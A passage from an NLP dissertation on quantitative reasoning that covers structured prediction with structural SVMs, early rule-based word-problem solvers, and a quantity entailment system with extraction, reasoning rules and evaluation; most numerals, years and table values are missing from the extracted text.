is the paradigm most widely used in this thesis. we introduce the problem of structured prediction via the example of part of speech tagging, and outline common approaches to solve this problem. . what is a structure? the concept of a structure is an important one in computational linguistics and machine learning. burton- roberts ( ) informally defines a structure as a complex object that is divisible into component parts, each of which can belong to different categories, have specific functions in the complete object and are arranged in a specifiable way. we will use the task of part-of-speech tagging as a running example in this section. we will use the following sentence as an illustrative example: i have twenty dollars in my pocket . the goal of part of speech tagging is to label each word in the sentence by one of part-of-speech tags. any valid output for the sentence above is a set of part-of-speech tags, one for each word in the sentence. this set of part-of-speech tags can be referred as a structure. . structured prediction let us now formulate the part of speech tagging problem as a structured prediction problem. we will denote the input sentence to the problem as x, and the output structure is denoted as yvec. in this case, the output structure y can be decomposed into a set of m variables y ,y , . . . ,yk, where m is the number of words in the input sentence x. each of the yi variables denotes the part of speech tag for the i-th word of input sentence x. therefore, each yi can be assigned one of the part-of-speech tags. finally we define x as the space of all possible inputs to a problem. here, it will denote the space of all sentences. we also define y as the space of all possible outputs. in our example, this will denote the set of all sequences of part of speech tags. the structured prediction problem is to learn a mapping function f(x; w) from an input space x to an output space y. this mapping function is parameterized with weights w of task relevant features φ(x, y). note that the feature function is defined over both the input x and the entire output structure y. this definition of a feature function allows us to design features to express the dependency between the local output variables for instances. in general, designing feature templates requires domain knowledge. for example, in our running example, it is common to use words in x conjuncted with the corresponding part of speech tag in y as features. we use the weight vector w and the feature function φ(x, y), to define a scoring function for output structures. often it takes the following linear form: s(y; w, x) = wt φ(x, y) we want this scoring function to assign a higher score to the correct output structure, and assign a lower score to all other structures. . inference in structured models suppose we have a weight vector w, such that scoring function s(y; w,x) scores the correct output structure higher than all other structures. how will we use such a scoring function to predict an output structure for an input x ? this involves searching for the best structure according to the scoring function; this is referred to as the inference problem in structured prediction. mathematically, this seen as computing the following. y∗ = arg max y∈y wt φ(x, y) where y is the space of feasible output structures. note that the part of y you need to search over, is usually very large. consider the case of our part of speech tagging example. for an input sentence of m words, the number of possible tag sequence is ( )m, since each word can have one of the tags. as a result, naively enumerating all output sequences and checking their score, is not a feasible solution. there are three options to solve the inference problem in a reasonably efficient way. first, you can transform the problem to an integer linear program (ilp), and then use an off the shelf ilp solver to solve the problem. this can still become intractable if the ilp contains a lot of variables. another option is to make independence assumptions between different parts of the output structure. an example of this in our tagging task can be to assume that the part of speech of the i th word is dependent only on the i th word and the part of speech tag of the (i− ) th word. these assumptions are often valid for the problem, and lead to efficient inference algorithms. however, for the problems we will address in this thesis, independence assumptions usually do not hold. hence, we opt for the third option, which is to perform approximate inference using beam search. the main idea behind beam search is to enumerate all possible assignments to the first output variable, and score them. keep only the top k assignments and discard the rest. next for each assignment of the first variable, enumerate all possible assignments for the second output variable, and again, keep the k highest scoring partial assignments, and discard the rest, and so on. here k is often referred to as the beam size. lets see how we can perform beam search for the part of speech tagging example. we will assign y (the output variable for the first word) all the tags, and score each assignment. scores of these partial assignments can be computed by using only the features that are dependent on y . we keep the top k, and move on to y , and so on. although beam search is an approximate procedure, in practice, it is very effective. also, the beam size is a parameter, which can be chosen to be a small value if the output space for the problem is very large. . learning structured prediction models finally, we discuss how to obtain a good scoring function for output structures. for this problem, assume we have access to a set of n labeled training examples d = {(xi, yi)}ni= . the learning problem is to find a weight vector w, such that it scores the target output structure higher than other structure. this means that you want the value of wt φ(xi, yi) to be higher than wt φ(xi, y), where y is any other feasible output structure. there are several learning algorithms which can be used to obtain such a weight vector. in this thesis, we mostly use structural support vector machines; we introduce them in the following subsection. . . structural support vector machines structured svms are a generalization of the binary svm algorithm [cortes and vapnik, ] to structured outputs [tsochantaridis et al., ]. the goal of the learning is to solve the following optimization problem: min w wt w +c ∑ i l(xi, yi, w) where l(xi, yi, w) is the loss function for the structured prediction. the loss function is written as l(xi, yi, w) = l(max y∈y ∆(yi, y) −wt φ(xi, yi) + wt φ(xi, y)) here ∆ signifies the quality of the structure y with respect to the annotated structure yi. the function l(·) can be instantiated by loss functions like the hinge loss, with l(x) = max( ,x). different algorithms have been proposed in the literature to solve the optimization problem [joachims et al., , shalev-shwartz et al., , chang et al., ]. in this thesis, we use the illinois-sl package [chang et al., ] with the dual-coordinate descent based algorithms. . discussion and special case for learning and inference with structured models, we need to specify the following: . the feature representation for a structure y for an input x, denoted as φ(x, y). . an inference algorithm that finds the best structure for an input x using a weight vector w. . a learning algorithm. note that both binary and multiclass classification problems are special cases of structured prediction. as a result, a structured predictor can be used for binary and multiclass classification. here we describe how can we convert a multiclass classification problem to a structured problem. lets assume a multiclass classification problem of k classes. usually feature functions for multiclass problems are defined only on the input x; lets denote it as φ(x). to convert this to a structured problem, we consider the output space y to be the set of class labels. we also define the feature function φ(x, y) to be the set of features φ(x) conjoined with the label y. with these definitions, we can now use the standard structured learning algorithm to do multiclass classification. in this thesis, we follow this procedure to perform multiclass classification with illinois-sl. . structured prediction with latent variables until now, our structured prediction framework has only two types of variables – input variables x and output variables y. both these variables are observed, that is, they are available as part of our training data. however, often times, important modeling information is not provided as part of the training data. for example, for the task of machine translation from english to french, training data comprises english sentences paired with corresponding translated french sentences. there are several intermediate variables which allow the translation of an english sentence to french, like the ones indicating word level or phrase level alignments. however these alignment variables are not provided as part of the training data. even though these variables are not provided, it is important to model them, in order to capture the process of translation. in such cases, they are modeled as latent variables h ∈ h, where h is the set of feasible assignments to the hidden variables. in order to extend the structured prediction formulation to the case of hidden variables, we redefine the feature function to also use the hidden variables (written as φ(x, h, y)). the inference problem is now to compute (h∗, y∗) = arg max (h,y)∈h×y wt φ(x, h, y) this part remains similar to the earlier case; we simply have to think of the output structure as a tuple comprising both the output and hidden variables. for learning, we again assume access to n labeled examples d = {(xi, yi)}ni= . the learning problem is to find a weight vector w, such that it scores the target output structure higher than other structures. the score of a structure y is now given as follows: max h∈h wt φ(x, h, y) in this thesis, we mostly use structural svm with latent variables [yu and joachims, ]. this involves solving the following optimization problem: min w [ wt w +c ∑ i max (ĥ,ŷ)∈h×y [wt φ(xi, ĥ, ŷ) + ∆(yi, ĥ, ŷ)] ] − [ c ∑ i max h∈h wt φ(xi, h, yi) ] where ∆(·) is again a loss function indicating the dissimilarity between ŷ and yi. see [yu and joachims, ] for details of the algorithm to solve the above optimization. chapter early work in quantitative reasoning work on quantitative reasoning problems in nlp dates back to the ’s. over the years, several efforts have been made to automatically solve different types of quantitative problems described in natural language text. most of these systems were essentially rule based, and imposed strong restrictions on the input text. only recently, statistical methods have been used in this context, and the focus has been on achieving robustness in handling a wide range of natural language text. in this chapter, we give an overview of these early systems, starting from the ’s to the present day. . early algebra and arithmetic solvers several efforts were made to automatically solve arithmetic and algebra word problems. we describe a few of them in the following subsections. . . student program the student program written by [bobrow, ] is the first system that tried to solve algebraic problems stated in natural language. it accepts inputs in a restricted set of english language and tries to solve the algebraic problem expressed in it. an example input to the student system is if the number of customer tom gets is twice the square of % of the number of advertisement he runs, and the number of advertisements he runs is , what is the number of customer tom gets ? the system parses individual sentences to extract mathematical relations among variables. they identify variables by several keywords, and consider the words around these keywords as identifiers for the variables. for example, “the number of customer tom gets” is a variable where the key word is “number”. they cannot handle coreference, hence multiple usage of the same variable will require the exact same phrase to be mentioned. in the above example, both the variable phrases “the number of customer tom gets” and “the number of advertisements he runs” are repeated verbatim when the same variable is used again. applying a set of rules recursively, complex sentence constructs are simplified into simpler forms free of conjunctions. certain substitutions (e.g. “ times” for “twice”), and truncations (e.g. “square of” to “square”) etc. are done until only the phrases representing variables remain, and are related with basic operators (like plus, times, percent etc.) to form a set of equations representing the problem. after such transformation the above problem becomes: (equal x (number of customer tom gets)) (equal (number of advertisements he runs) ) (equal (number of customers tom gets) (times (expt (times . (number of advertisements he runs)) ))) finally standard techniques for solving system of equations are used to get the answer. . . other arithmetic word problem solvers another system called wordpro was developed by [fletcher, ] for solving arithmetic word prob- lems. wordpro was the first to introduce the concept of set “schema” [marshall, ] as the basis of construction of problem model. schemas can be thought as categories for the arithmetic word problem; each schema also has several attributes associated with it. for example, a “change” schema represents relation amongst a start-set (“joe had marbles”), transfer-set (“then tom gave him marbles”) and result-set (“how many marbles does joe have now?”). table . lists the instantiations of three “schemas” used in wordpro. they also used a categorization of these schemas based on which component of the schema is the question asking about. the program solves a problem guided by list of rules which are applied sequen- tially. a drawback of wordpro was that it did not accept natural language text as input, it assumes that the input problem has already been mapped to a set of propositions. two other programs, namely chips [diane j. briars, ] and arithpro [dellarosa, ] could also solve one-step arithmetic word problems with only one possible operation – addition/subtraction. both chips and arithpro categorize simple word problems into the same three categories: compare, combine and change. but for both these models rigid limitations were imposed on the change verb (only “to give”) and on the order of the problem sentences (the first sentence of the problem must describe the number of objects the owner had to begin with, whereas the second sentence must contain the verb “gave”). schema instantiations change john has apples. then he gave apples to susan. how many apples does fred have now ? combine adam has apples. sarah has apples. how many apples do they have altogether ? compare dennis has apples. fred has apples. how many apples does fred have less than dennis ? table . : schemas used in wordpro [bakman, ] developed a more advanced arithmetic problem solver called robust, that could un- derstand multi-step arithmetic word problems and that too with extraneous information. an example for a problem handled by robust is as follows: ruth had nuts more than dan had. ruth gave dan nuts. dan gave nuts to david. now dan has nuts and david has nuts. how many nuts does ruth have now ? the concept of “schema” as used in the earlier works is adopted with further expansion of “change” schemas into six distinct categories as against only two used earlier. this fine grained categorization for change helped them to detect irrelevant numbers in the problem. the robust simulation works by first parsing the problem text to split all sentences into propositions or simple sentences like “ruth had nuts more than dan had”, “ruth has ? nuts”, etc. for the above problem. the propositions having complex change verbs like “give” are further split into elementary ones (like “ruth gave dan nuts” is split into “ruth forfeited nuts” and “dan got nuts”). then the change schema relations are applied to the elementary propositions by substituting the constant values for the corresponding variables. although it handles irrelevant numbers, robust still restricts the operations to be addition and subtraction. a detailed discussion of these systems can be found in [mukherjee and garain, ], and indeed a lot of the examples were taken from that survey. all the systems described above have different restrictions in the types of problems they handle. also, they do not perform evaluation on any benchmark datasets; some of the systems are also not publicly available. as a result, it is impossible to compare these systems. . solvers for other domains there were several systems developed also for related fields like geometry, physics, chemistry and calculus problems. since they are less relevant for this dissertation, we only give a brief overview of these systems. • the program, carps i.e. calculus rate problem solver [charniak, ] written by eugene charniak reads, solves calculus rate problems stated in english. • the system of happiness was developed by [gelb, ] to solve simple probability questions. • the newton program written by [de kleer, ] is an expert problem solver in the domain of mechanics, specifically, relating to kinematics of objects moving on surface. • the program mecho developed in prolog by [bundy et al., ] solves mechanics problems stated in english in the areas of pulley problems, statics problems, motion on smooth complex paths and motion under constant acceleration. • isaac program written by [novak, ] can read, understand, solve and draw pictures of physics problems stated in english. • albert developed by [oberem, ] is an intelligent tutoring (cai) system that not only under- stands and solves physics (more specifically kinematics) problems but can also teach a student how to solve them. . recent advances in statistical solvers all the methods discussed earlier in this chapter use some form of rule based systems to arrive at the output equation or answer. however, hand-engineered rules have an obvious drawback – they do not provide robustness to the variability of input text. indeed, most of the early systems constrained their input to be of a few specific forms, which allowed them to develop transformation rules for problem solving. recently, there has been a renewed interest in solving quantitative reasoning problems. it started in with the template based system of nate kushman [kushman et al., ], which focused on solving algebra word problems. this was followed by the aries system of allen institute for artificial intelligence (ai ), which focused on solving addition subtraction problems. all recent methods (including the work done in this thesis) use some form of machine learning to achieve robustness, something which earlier systems lacked. however, it should be noted that some of the challenges that were identified and ideas introduced by the early works are still relevant for building robust statistical methods. many of these ideas are used alongside statistical methods in this thesis. chapter quantity entailment . introduction in this chapter, we investigate the problem of reasoning with respect to quantities using only the local context. consider the textual inference in example . , which we present as a textual entailment query [dagan et al., ]. example . t:a bomb in a hebrew university cafeteria killed five americans and four israelis. h:a bombing at hebrew university in jerusalem killed nine people, including five americans. to determine whether h is implied or entailed by t, we need to identify the quantities and the units from “five americans” and “four israelis”, as well as use the fact that “americans” and “israelis” are “people”. all these inferences can be made by processing local context of the quantities. in this chapter, we describe some key steps necessary to facilitate reasoning about quantities with local context. we first describe a system developed to recognize quantities in free form text, infer units associated with them and convert them to a standardized form. for example, in example . about six and a half hours later , mr. armstrong opened the landing craft’s hatch. we would like to extract the number . , the corresponding unit, “hour”, and also determine that the quantity describes an approximate figure, not an exact one. one of the difficulties is that any noun or noun phrase can be a unit, and inferring them requires analyzing contextual cues and local sentence structure. as we show, in some cases deeper nlp techniques are required to support that. we then develop a reasoning framework for quantities that we believe can play an important role in general purpose textual inference. as an evaluation metric for local context based reasoning, we isolate the quantity reasoning component of the rte task, and formulate quantity entailment (qe) – the task of determining whether a given quantity can be inferred from a given text snippet. we then describe our approach towards solving it. as an additional evaluation, we also show the effectiveness of our system on an application of qe, a search for ranges of currency values. given a query range, say from million usd to million usd, we want to find all mentions of money with values in this range. using standard search engine technology to query all values in the range, in the various forms they could be expressed, is not feasible. instead, we use our proposed approach to extract monetary mentions from text and normalize them, and then we use qe to verify them against the query. we develop and annotate datasets for evaluation, and show that our approach can handle the aforemen- tioned reasoning tasks quite well. the next section presents some related work on quantities and reasoning. we then formally define a quantity and describe our knowledge representation. the following sections describe quantities extraction and standardization. we next present the formulation of quantity entailment, and describe our reasoning framework for it. . related work quantities in textual entailment quantities have been recognized as an important part of a textual entailment system [de marneffe et al., , maccartney and manning, , sammons et al., ], and [de marneffe et al., ] claims that discrepancies in numbers are a common source of contradictions in natural language text. the authors describe a corpus of real-life contradictory pairs from multiple sources such as wikipedia and google news in which they found that % of the contradictions were due to numeric discrepancies. in addition, they analyzed several textual entailment datasets [dagan et al., ] and found that numeric contradictions constitute . % of contradictory entailment pairs. monotonicity in reasoning the reasoning framework described in this chapter borrows ideas of mono- tonicity.depends quantities often depends on reasoning about monotonicity. the role of monotonicity in nl reasoning has been described in [barwise and cooper, ]. the authors categorize noun phrases as upward the datasets are available for download at http://cogcomp.cs.illinois.edu/page/resource view/ . the related software is available at http://cogcomp.cs.illinois.edu/page/software view/quantifier. or downward monotonic, and also detect constructs where monotonicity depends on context. the large role of monotonicity in reasoning motivated attempts to reason directly at the surface level [purdy, ], rather than converting first to logical forms. our approach advocates this direction too. representation of quantities [kuehne, a] investigates the various cases in which physical quan- tities are represented in descriptions of physical processes. later, in [kuehne, b], a system to extract qualitative process theory [forbus, ] representations is implemented for a controlled subset of the english language. while these approaches do not scale to unrestricted english, they have influenced the quantity representation that we use. . representing quantities in general, quantity refers to anything which is measurable. our quantities representation is influenced by the one proposed in [forbus, ] but we propose a simpler version of their qualitative process theory: definition (quantity-value representation) in quantity-value representation (qvr), a quantity is represented as a triple (v,u,c), where constituents in the triple correspond, respectively, to: . value: a numeric value, range, or set of values which measure the aspect, e.g. more than , one or two, thousands, march , . the value can also be described via symbolic value (e.g., “below the freezing point”). we do not store surface forms explicitly, but convert them to a set or range. for example, “more than ” is stored as the range ( , +∞). details of these conversions are given in section . . . . units: a noun phrase that describes what the value is associated with. e.g., inches, minutes, bananas. the phrase “us soldiers” in the phrase “five us soldiers” is a unit. . change: specifies how the parameter is changing, e.g., increasing. this constituent often serves as an indication of whether or not the value is relative to another. for example, “she will receive an [additional cents per hour]”, “the stock [increased percent]”, “jim has [ balls more] than tim”. . extraction of quantities in this section we describe the first component of our approach, that of identifying quantities and units in text and standardizing their representation. we use a a two step approach to extract quantities from free form text. . segmentation this step takes raw text and finds segments of contiguous text which describe quan- tities. . standardization using the phrases extracted in the previous step, we derive the qvr. an overview of our method is given in algorithm . algorithm quantityextraction( t ) input: text t output: set of quantity-value triples extracted from t : q ←∅ : s ← segmentation( t ) : for all segment s ∈ s do : q ← standardization( s ) : if unit of q not inferred then : q ← inferunitfromsemantics( q, s, t ) : end if : q ← q∪{q} : end for : return q we model the segmentation step as a sequence segmentation task because quantities often appear as segments of contiguous text. we adapt and compare two approaches that were found successful in previous sequential segmentation work in nlp: . a semi-crf model [sarawagi and cohen, ], trained using a structured perceptron algorithm [collins, ], with parameter averaging [freund and schapire, ]. . a bank of classifiers approach [punyakanok and roth, ] that we retrain with a new set of features. the same feature set was used for both approaches. despite the additional expressive power of crfs, we found that the bank of classifiers (which is followed by a simple and tractable inference step) performs better for our task, and also requires significantly less computation time. . . features for each token xi in the input sequence we extract the following features: . word class features: xi appears in a list of known scientific units (e.g., meters, fahrenheit), written numbers (e.g., two, fifteen), names of a months, day of the week, miscellaneous temporal words (e.g. today, tomorrow), currency units, etc. . character-based: xi contains a digit, is all digits, has a suffix (st,nd,rd,th). . part of speech tags: we use the illinois pos tagger [roth and zelenko, ]. . most of the features were generated from a window of [− , ] around the current word. additional features were generated from these by conjoining them with offset values from the current word. . . mapping text segments into qvr we develop a rule-based standardization step, that is informed, as needed, by deeper nl processing, including semantic role labeling (srl, [palmer et al., ]) and co-reference resolution. some key steps of this procedure are as follows: . convert written numbers to floating point: e.g., three thousand five hundred twenty → . . convert dates to an internal date type: e.g., march th → date( / /xxxx) . replace known names for ranges: e.g., teenage → [ , ] years-old. . convert all scientific units to a standard base unit: e.g., mile → . meters. . replace non-scientific units with wordnet synsets . rewrite known units to a standard unit: e.g., usd, us$, dollars → us$. . standardize changing quantity: e.g., “additional books” → + [book]. . extract bounds: we use a list of phrases, such as “more than”, “less than”, “roughly”, “nearly”. by default, if a bound keyword is not present we assume the bound is “=”. . modify value using bounds : we convert values which have a bound to a range of values. scalar implicature is taken into consideration here. consider the sentence “john bought books.”, although it can be interpreted that buying books is a corollary of buying , in this case, we make the assumption that books were not purchased. see section . . for a discussion on the subject. we use the following rules, where v is the value extracted before using bound information. • ≤ v → (−∞,v], similarly for ≥,<,>. • = v →{v} • ≈ v → [v − c.v,v + c.v], we use c = . . . . extraction of units in most cases, the units related to the numeric values appear adjacent to them. for example, in the sentence “there are two books on the table”, the unit “book” follows “two”. the sequence segmentation groups these words together, from which it is easy to extract the unit. however, in some cases, a better understanding of the text is needed to infer the units. consider the following example: example . a report from unaids, the joint united nations program on hiv/aids, released on tuesday, shows the number of adults and children with hiv/aids reached . million in . here, we need to know that “ . million” refers to “the number of adults and children with hiv/aids”. also, in: example . the number of member nations was in , and then it increased to . we need to know that the pronoun “it” refers to “the number of member nations”. we employ a sequential process in our standardization. in case the first step described above fails to extract units, we make use of deeper processing of the sentence to accomplish that (see an evaluation of the contribution of this in the experimental section). these steps are denoted by the function inferunitfrom- semantics() in algorithm . we apply coreference resolution to identify pronoun referents and then apply a semantic role labeler, to recognize which terms are associated with the quantity, and can be potential units. in the case of example . , the srl tells us that for the verb “reached”, the associated subject is “the number of adults and children with hiv/aids” and the object is the mention “ . million”. hence, we conclude that the subject can be a candidate for the unit of “ . million”. for the purpose of entailment, we keep the entire set of possible word chunks, which are linked by the srl to our quantity mention, as candidate units. since most units are found in positions adjacent to the numeric mention, we optimize on runtime by ap- plying the srl and coreference resolver only when the segmented chunk does not have adequate information to infer the unit. we use the illinois coreference resolver ([bengtson and roth, ], [kai-wei chang and roth, ]) and the illinois srl [punyakanok et al., ], for coreference and seman- tic role labelling, respectively. . quantity entailment in this section we describe our approach to quantitative reasoning using local context of quantities. we first formulate the task of quantity entailment, and then describe our reasoning framework. definition (quantity entailment) given a text passage t and a quantity-value triple h(ch,vh,uh), quantity entailment is a -way decision problem: . entails: there exists a quantity in t which entails h. . contradicts: no quantity in t entails h, but there is a quantity in t which contradicts h. . no relation: there exists no quantity in t, which is comparable with h. since the decision is about a single quantity-value triple, we believe this will test the capability to capture local contextual cues of the quantity. this task can also be seen as a building block for a general textual entailment system. the need to identify sub-problems of textual inference, in the context of the rte task, has been motivated by [sammons et al., ]. quantity entailment can be considered as one such step. since we envision that our qe module will be one module in an rte system, we expect that the rte system will provide it with some control information. for example, it is often important to know whether the quantity is mentioned in an upward or downward monotonic context. since we are evaluating our qe approach in isolation, we will always assume upward monotonicity, which is a lot more common. monotonicity has been modeled with some success in entailment systems [maccartney and manning, ], thus providing a clear and intuitive framework for incorporating an inference resource like the quantity entailment module into a full textual entailment system. . . reasoning framework our quantity entailment process has two phases: extraction and reasoning. in the extraction phase, we take a text passage t and extract quantity-value triples (value, units, change) from it. in the reasoning phase, we apply a lightweight logical inference procedure to the triples extracted from t to check if h can be derived. there are two types of rules applied in the reasoning phase: implicit quantity productions and quantity comparisons. the combination of these rules provides good coverage for the qe task. quantity comparison quantity comparison compares a quantity t : (vt,ut,ct) extracted from t and the quantity h : (vh,uh,ch) and decides whether h can be derived via some truth preserving transformation of t. there are three possibilities: (t entails h), (t contradicts h), or (t has no relation with h). the overview is given in alg. , which is designed under our assumption that entailing quantities should respect upward monotonicity. this requires monotonicity verification of both units and values. in order for a quantity to contradict or entail another, their units must be comparable. determining the comparability of scientific units is direct since they form a closed set. comparing non-scientific units is more involved. the inference rule used here is as follows: if the syntactic heads of the unit phrases match (i.e., there is an is-a or synonymy relation in either direction), then the phrases are comparable. these comparisons are encoded as a function comparableunits(ut, uh), which returns true if the units ut and uh are comparable, or else returns false. if the units are comparable, the direction of monotonicity (i.e., the direction of the is-a relation between the heads and the effects of any relevant modifiers) is verified. the function checkmonotonicityofu- nits(ut, uh) returns true, if ut is more specific than uh, false otherwise. to compute the is-a and synonymy relations we use wordnet [miller et al., ], an ontology of words which contains these relations. we also augment wordnet with two lists from wikipedia (specifically, lists of nationalities and jobs). next, we check whether the values of the quantities compared obey the monotonicity assumption; we say that vt is more specific than vh if vt is a subset of vh. (note that vt and vh are both represented as sets and hence, checking subset relation is straightforward.) for example, “more than ” ⊆ “at least ”. this rule also applies to dates, e.g. “ / / ” ⊆ “march ”. respecting scalar implicature, we assume that “ ” is subset of “less than ”, but not “ ”. similar to the case of units, we use the function checkmonotonicityofvalues(vt, vh) which returns true, if vt is more specific than vh, and false otherwise. a quantity which represents some form of change of a quantity cannot be derived from a quantity which does not represent change and vice versa. we set ct = true if t denotes change in a quantity, otherwise we set ct = false. algorithm quantitycomparison( t, h ) input: quantity-value triples t(vt,ut,ct) and h(vh,uh,ch) output: returns whether t entails, contradicts or has no relation with h : if ct = ch then : return no relation : end if : if comparableunits( ut, uh )= false then : return no relation : end if : if checkmonotonicityofunits( ut, uh )= true then : if checkmonotonicityofvalues( vt, vh )= true then : return entails : end if : end if : return contradicts implicit quantity production rules there are many relationships among quantities which can be the source of implicit information. the following is an incomplete, but relatively broad coverage list of common patterns: . range may imply duration, e.g., “john lived in miami from to ” implies that john lived in miami for a duration of years. . compatible terms may be combined and abstracted. the sentence “i bought bananas, oranges, and apple” implies that fruits were purchased. . ratios can imply percentages. the sentence “ out of the dentists interviewed recommend brushing your teeth” implies that % of the dentists interviewed recommend brushing. . composition: quantities and units may sometimes be composed. consider the following examples, the phrase “six korean couples” means that there are people; the phrase “john gave six -minute speeches” implies that john spoke for minutes. the rules used for producing implicit quantities employed in our system are the following: • (a ratio b) if a is a percentage, then multiply its value with the value of b to obtain a new quantity with the units of b. • (a ratio b) if a is not percentage, divide its value with the value of b to obtain a new quantity with the units of b. • (a range b) take the difference of the two values to obtain a new quantity with the appropriate change of units, e.g., time-stamp minus time-stamp results in units of time. algorithm quantityentailment( t, h ) input: text t and a quantity-value triples h(vh,uh,ch) output: returns whether t entails, contradicts or has no relation with h : q ← quantityextraction( t ) : q′ ← generateimplicitquantities( q ) : q ← q∪q′ : contradict ← false : for all quantity-value triple q ∈ q do : if quantitycomparison( q, h )= entails then : return entails : end if : if quantitycomparison( q, h )= contradicts then : contradict← true : end if : end for : if contradict= true then : return contradicts : else : return no relation : end if lightweight logical inference the qe inference procedure simply applies each of the implicit quantity production rules to the quantity- value triples extracted from the passage t, until no more quantities are produced. then it compares each quantity t extracted from t with the quantity h, according to the quantity comparison rules described in algorithm . if any quantity in t entails h, then “entails” is reported; if there is no quantity in t which can explain h, but there exists one which contradicts h, then “contradiction” is reported; otherwise “no relation” is reported. the complete approach to quantity entailment is given in algorithm . . . scope of qe inference our current qe procedure is limited in several ways. in all cases, we attribute these limitations to subtle and deeper language understanding, which we delegate to the application module that will use our qe procedure as a subroutine. consider the following examples: t : adam has exactly dollars in the bank. h : adam has dollars in the bank. h : adam’s bank balance is dollars. here, t implies h but not h . however for both h and h , qe will infer that “ dollars” is a contradiction to sentence t, since it cannot make the subtle distinction required here. t : ten students passed the exam, but six students failed it. h : at least eight students failed the exam. here again, qe will only output that t implies “at least eight students”, despite the second part of t. qe reasons about the quantities, and there needs to be an application specific module that understands which quantity is related to the predicate “failed”. there also exists limitations regarding inferences with respect to events that could occur over a period of time. in “it was raining from pm to pm” one needs to infer that “it was raining at pm” although “ pm” is more specific than “ pm to pm”. there is a need to understand the role of associated verbs and entities, and the monotonicity of the passages to infer the global entailment decision. many of these challenges will be handled in the later chapters of the thesis. . experimental study in this section, we seek to validate our proposed modeling. we evaluate our system’s performance on four tasks: quantity segmentation, quantity entailment and currency range search. we do not directly evaluate our system’s ability to map raw text segments into our representation, but instead evaluate this capability extrinsically, in the context of the aforementioned tasks, since good standardization is necessary to perform quantitative inference. . . datasets qe: due to lack of related work, an adequately annotated corpus does not exist. thus, in order to evaluate our system, we used two collections: . sub-corpus of the rte datasets we choose text-hypothesis pairs from rte –rte datasets, which have quantity mentions in the hypothesis. overall, we selected text-hypothesis pairs with quantities in the hypothesis. . newswire text sentences of newswire text were selected, all containing quantity mentions. both these datasets were manually annotated with the phrase boundaries of quantity mentions and had an inter-annotator agreement of . . we restricted annotation to contiguous segments of text. no instances of implicit quantities were annotated. we also did not annotate these mentions with qvrs. limiting the annotations to contiguous spans of text results in a few instances of quantities which contain missing information, such as missing or ambiguous units, and several range and ratio relationships which were not annotated (e.g., we do not annotate the range expressed in “from [ million] in [ ] to [ million] in [ ]”, but do so in “[from million to million]”). in the rte sub-corpus we also annotated entailment pairs with information about which quantities entail, in addition to the boundary information. for each quantity in the hypothesis we labeled it as either “entails”, “no relation”, or “contradicts”, with an inter-annotator agreement of . . there were entailing quantities, contradicting quantities and quantities which were unrelated to the corresponding text. we also maintained the information about general entailment, that is, whether the hypothesis can be explained by the text. an example of an annotated rte example is shown below. annotation example for rte sub-corpus t:a bomb in a hebrew university cafeteria killed [five americans] and [four israelis]. h:a bombing at hebrew university in jerusalem killed [nine people], including [five americans]. “nine people” : entails “five americans” : entails global entailment decision : entails although we limit our scope to infer the entailment decision for individual quantities mentioned in hypothesis, we hope to see future approaches use these individual decisions and combine them appropriately to obtain the global entailment decision. currency search we developed a new dataset for evaluating currency search. queries of various amounts of money like “ $”, “usd million”, etc. were made on a search engine, and paragraphs containing monetary mentions were taken from the top search results. we collected paragraphs containing various mentions of monetary values, and labeled them with the amount mentioned in them. we restricted the denominations to us dollars. the inter-annotator agreement was . . . . quantity segmentation we evaluate the phrase boundary recognizer on the annotated rte and newswire datasets described in the previous section, using the phrase-based f score. we compare the accuracy and running times of the semi-crf model (sc) [sarawagi and cohen, ] and the bank of classifiers model (c+i) (pr) [punyakanok and roth, ], using -fold cross-validation. note that the standardizer can often recover from mistakes made at the segmentation level. therefore, this performance does not necessarily upper bound the performance of the next step in our pipeline. the segmentation we are aiming for does not directly follow from syntactic structure of a sentence. for example, in the sentence “ the unemployment rate increased %”, we would like to segment together “increased %”, since this tells us that the quantity denotes a rise in value. also, in the sentence “apple restores push email in germany, nearly two years after motorola shut it down” we would like to segment together ”nearly two years after” . we consider a quantity to be correctly detected only when we have the exact phrase that we want, otherwise we consider the segment to be undetected. model p% r% f% train test time time semi-crf (sc) . . . . . c+i (pr) . . . . . table . : -fold cross-validation results of segmentation accuracy and time required for segmentation, the columns for runtime have been normalized and expressed as ratios table . describes the segmentation accuracy, as well as the ratio between the time taken by both approaches. the bank of classifiers approach gives slightly better accuracy than the semi-crf model, and is also significantly faster. . . quantity entailment we evaluate the complete quantity entailment system, determining the overall loss due to the segmentation, as well as the contribution of the coreference resolver and srl. we show the performance of systems. . goldseg : uses gold segmentation, and does not use srl and coreference resolver. . goldseg+sem : uses gold segmentation, and also uses srl and coreference resolver to infer units. . predseg : performs segmentation, and does not use srl and coreference resolver. . predseg+sem : performs segmentation, and uses srl and coreference resolver. the baseline is an exact string matching algorithm. it answers “entails” if the quantity unit and value are present in the text, and answers “contradicts” if only the unit matches and the value does not. otherwise, it returns “no relation”. the results are shown in table . . note that exact match only supports . % of the entailment decisions. it is also evident that the deeper semantic analysis using srl and coreference improves the quantitative inference. task system p% r% f% entailment baseline . . . goldseg . . . +sem . . . predseg . . . +sem . . . contradiction baseline . . . goldseg . . . +sem . . . predseg . . . +sem . . . no relation baseline . . . goldseg . . . +sem . . . predseg . . . +sem . . . table . : results of qe; adding semantics(+sem) consistently improves performance; only . % of entailing quantities can be recovered by simple string matching . . currency range search table . shows the performance of our system in detecting currency phrases. we evaluate our system on the proportion of monetary mentions it recognized and standardized correctly from queried ranges of currency values, and report micro-averaged scores. note that range search is a direct application of qe, where the quantity is a range of values, and the text is the corpus we want to search. all instances of “entails” correspond to search hits. the baseline here is also a string matching algorithm, which searches for numbers in the text. system p% r% f% baseline . . . predseg+sem . . . table . : micro-averaged accuracy in detecting monetary mentions . . qualitative analysis the segmentation module made mistakes in detecting exact boundaries for uncommon phrases, e.g., “hun- dreds of thousands of people”, and “mid- ’s”. detection of missing units is problematic in cases like “three eggs are better than two”. the srl returns “three eggs” as a candidate unit, which needs to be pruned appropriately to obtain the correct unit. the primary limitation of the reasoning system in both tasks is the lack of an extensive knowledge base. wordnet based synsets prove to be insufficient to infer whether units are compatible. also, there are certain reasoning patterns and various implicit relations be- tween quantities which are not currently handled in the system. for example, inferring from the sentence “militants in rwanda killed an [average of , people per day] for [ days]” that “around , peo- ple were killed”. also, implication of ratios can be involved. for example, the sentence “[one out of participating students] will get the award” implies that there were “ participating students”, whereas “[ out of dentists] recommend brushing” does not imply there were dentists. . conclusion we studied reasoning about quantities in natural language text, with respect to local context. we have iden- tified and defined an interesting and useful slice of the textual entailment problem, the quantity entailment task. since this problem involves inferences about individual quantities, it allows us to capture quantitative reasoning with respect to local context. our ability to support local context based quantitative reasoning 